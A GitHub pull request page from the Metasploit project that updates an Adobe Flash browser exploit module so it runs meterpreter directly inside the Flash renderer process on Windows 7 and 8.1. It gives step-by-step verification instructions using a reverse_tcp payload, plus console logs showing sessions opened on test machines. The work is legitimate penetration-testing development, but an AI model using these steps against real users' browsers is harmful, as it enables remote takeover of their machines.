Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

adobe_flash_copy_pixels_to_byte_array: Execution from the flash renderer / Windows 8.1 #5486

Merged
merged 2 commits into from
Jun 5, 2015
Merged

adobe_flash_copy_pixels_to_byte_array: Execution from the flash renderer / Windows 8.1 #5486

merged 2 commits into from
Jun 5, 2015

Conversation

jvazquez-r7
Copy link
Contributor

This PR modifies modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb to allow native payload execution from the flash renderer process. So not more powershell. We execute meterpreter directly and we remain in the same flash renderer process.

It also adds supports for:

  • Firefox / Adobe Flash plug-in on Windows 7 SP1 (32 bits).
  • Firefox / Adobe Flash plug-in on Windows 8.1

On the other hand, updates adobe_flash_copy_pixels_to_byte_array, adobe_flash_uncompress_zlib_uaf and adobe_flash_net_connection_confusion with GreatRanking since all of them are getting native code execution in the same renderer process without crashing it. And has a good version coverage for Adobe Flash. <-- ping @wchen-r7 let me know if you'd like to discuss something about the criteria!

Verification

  • Install a Windows 7 target: Windows 7 SP1 / IE 11 / Adobe Flash 14.0.0.176 (ActiveX) / Firefox 38.0.5 / Adobe Flash 14.0.0.179 (plugin)
  • Install a Windows 8.1 target: Windows 8 SP1 (32 bits or 64 bits), Firefox 38.0.5 (32 bits) and Flash 14.0.0.179 (Plug-in)
  • Run msfconsole and use the module modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array
  • Run the module with the windows target and windows/meterpreter/reverse_tcp payload
  • Visit the page from Windows 7 SP1 / IE 11 / Adobe Flash 14.0.0.176 (ActiveX), verify which you get a session and it lives inside the IE renderer process:
msf exploit(adobe_flash_copy_pixels_to_byte_array) > [*] Using URL: http://172.16.158.1:8080/nz48jvfnBMpVNHC
[*] Server started.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Gathering target information.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending HTML response.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Request: /nz48jvfnBMpVNHC/rdRjmD/
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending HTML...
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Request: /nz48jvfnBMpVNHC/rdRjmD/tkpM.swf
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending SWF...
[*] Sending stage (884270 bytes) to 172.16.158.131
[*] Meterpreter session 6 opened (172.16.158.1:4444 -> 172.16.158.131:51400) at 2015-06-04 18:11:41 -0500

msf exploit(adobe_flash_copy_pixels_to_byte_array) > sessions -i 6
[*] Starting interaction with 6...

meterpreter > sysinfo
gComputer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > getpid
Current pid: 2264
meterpreter > ps -S 2264


Process list
============

 PID   Name                                Arch  Session  User                          Path
 ---   ----                                ----  -------  ----                          ----
 2264  iexplore.exe                        x86   1        WIN-RNJ7NBRK9L7\Juan Vazquez  C:\Program Files\Internet Explorer\iexplore.exe


meterpreter >
  • Visit the page from Windows 7 SP1 / Firefox / Adobe Flash 14.0.0.179 (plugin), verify which you get a session and it lives inside the Flash renderer process:
msf exploit(adobe_flash_copy_pixels_to_byte_array) > [*] Using URL: http://172.16.158.1:8080/zPqiSaM
[*] Server started.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Gathering target information.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending HTML response.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Request: /zPqiSaM/sopMhI/
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending HTML...
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Request: /zPqiSaM/sopMhI/VZeUfv.swf
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending SWF...
[*] Sending stage (884270 bytes) to 172.16.158.131
[*] Meterpreter session 8 opened (172.16.158.1:4444 -> 172.16.158.131:51415) at 2015-06-04 18:13:46 -0500

msf exploit(adobe_flash_copy_pixels_to_byte_array) > sessions -i 8
[*] Starting interaction with 8...

meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > getpid
Current pid: 5868
meterpreter > ps -S 5868


Process list
============

 PID   Name                                Arch  Session  User                          Path
 ---   ----                                ----  -------  ----                          ----
 5868  FlashPlayerPlugin_14_0_0_179.exe    x86   1        WIN-RNJ7NBRK9L7\Juan Vazquez  C:\Windows\system32\Macromed\Flash\FlashPlayerPlugin_14_0_0_179.exe


meterpreter >
  • Visit the page from Window 8.1 / Firefox 38.0.5 / Adobe Flash 14.0.0.179 (Plugin), verify which you get a session and it lives inside the Flash renderer process:
[*] 172.16.158.132   adobe_flash_copy_pixels_to_byte_array - Gathering target information.
[*] 172.16.158.132   adobe_flash_copy_pixels_to_byte_array - Sending HTML response.
[*] 172.16.158.132   adobe_flash_copy_pixels_to_byte_array - Request: /zPqiSaM/sopMhI/
[*] 172.16.158.132   adobe_flash_copy_pixels_to_byte_array - Sending HTML...
[*] 172.16.158.132   adobe_flash_copy_pixels_to_byte_array - Request: /zPqiSaM/sopMhI/OdgB.swf
[*] 172.16.158.132   adobe_flash_copy_pixels_to_byte_array - Sending SWF...
[*] Sending stage (884270 bytes) to 172.16.158.132
[*] Meterpreter session 9 opened (172.16.158.1:4444 -> 172.16.158.132:50807) at 2015-06-04 18:21:56 -0500

msf exploit(adobe_flash_copy_pixels_to_byte_array) > sessions -i 9
[*] Starting interaction with 9...

meterpreter > sysinfo
Computer        : WIN-U7MBH836GNO
OS              : Windows 8.1 (Build 9600).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > getpid
Current pid: 1028
meterpreter > ps -S 1028


Process list
============

 PID   Name                              Arch  Session  User                  Path
 ---   ----                              ----  -------  ----                  ----
 1028  FlashPlayerPlugin_14_0_0_179.exe  x86   1        WIN-U7MBH836GNO\juan  C:\Windows\system32\Macromed\Flash\FlashPlayerPlugin_14_0_0_179.exe


meterpreter > exit
[*] Shutting down Meterpreter...

@OJ
Copy link
Contributor

OJ commented Jun 4, 2015

excited

@wchen-r7 wchen-r7 self-assigned this Jun 4, 2015
@wchen-r7
Copy link
Contributor

wchen-r7 commented Jun 4, 2015

I'll test this in a bit.

@wchen-r7
Copy link
Contributor

wchen-r7 commented Jun 5, 2015

Windows 7:

msf exploit(adobe_flash_copy_pixels_to_byte_array) > [*] Using URL: http://0.0.0.0:8080/xTjS7ewIX5BEmG
[*] Local IP: http://192.168.1.64:8080/xTjS7ewIX5BEmG
[*] Server started.
[*] 192.168.1.168    adobe_flash_copy_pixels_to_byte_array - Gathering target information.
[*] 192.168.1.168    adobe_flash_copy_pixels_to_byte_array - Sending HTML response.
[*] 192.168.1.168    adobe_flash_copy_pixels_to_byte_array - Request: /xTjS7ewIX5BEmG/NSjpxY/
[*] 192.168.1.168    adobe_flash_copy_pixels_to_byte_array - Sending HTML...
[*] 192.168.1.168    adobe_flash_copy_pixels_to_byte_array - Request: /xTjS7ewIX5BEmG/NSjpxY/yVelC.swf
[*] 192.168.1.168    adobe_flash_copy_pixels_to_byte_array - Sending SWF...
[*] Sending stage (884270 bytes) to 192.168.1.168
[*] Meterpreter session 1 opened (192.168.1.64:4444 -> 192.168.1.168:49342) at 2015-06-04 23:24:08 -0500

Windows 8.1

msf exploit(adobe_flash_copy_pixels_to_byte_array) > [*] Using URL: http://0.0.0.0:8080/Xz1Qa41qVY1ihoX
[*] Local IP: http://192.168.1.64:8080/Xz1Qa41qVY1ihoX
[*] Server started.
[*] 192.168.1.138    adobe_flash_copy_pixels_to_byte_array - Gathering target information.
[*] 192.168.1.138    adobe_flash_copy_pixels_to_byte_array - Sending HTML response.
[*] 192.168.1.138    adobe_flash_copy_pixels_to_byte_array - Request: /Xz1Qa41qVY1ihoX/dzmJba/
[*] 192.168.1.138    adobe_flash_copy_pixels_to_byte_array - Sending HTML...
[*] 192.168.1.138    adobe_flash_copy_pixels_to_byte_array - Request: /Xz1Qa41qVY1ihoX/dzmJba/oBvJ.swf
[*] 192.168.1.138    adobe_flash_copy_pixels_to_byte_array - Sending SWF...
[*] Sending stage (884270 bytes) to 192.168.1.138
[*] Meterpreter session 3 opened (192.168.1.64:4444 -> 192.168.1.138:50815) at 2015-06-04 23:30:08 -0500

@wchen-r7
Copy link
Contributor

wchen-r7 commented Jun 5, 2015

On the other hand, updates adobe_flash_copy_pixels_to_byte_array, adobe_flash_uncompress_zlib_uaf and adobe_flash_net_connection_confusion with GreatRanking since all of them are getting native code execution in the same renderer process without crashing it. And has a good version coverage for Adobe Flash. <-- ping @wchen-r7 let me know if you'd like to discuss something about the criteria!

Yeah that sounds good. That's what I recommended earlier too. I'll bump them.

Never mind, they are already GreatRanking.

@wchen-r7 wchen-r7 merged commit 51d98e1 into rapid7:master Jun 5, 2015
wchen-r7 added a commit that referenced this pull request Jun 5, 2015
@wchen-r7
Land #5486, exec code from the renderer process instead of Powershell
935ed41
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@wchen-r7 wchen-r7

Labels
enhancement module
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
3 participants
@jvazquez-r7 @OJ @wchen-r7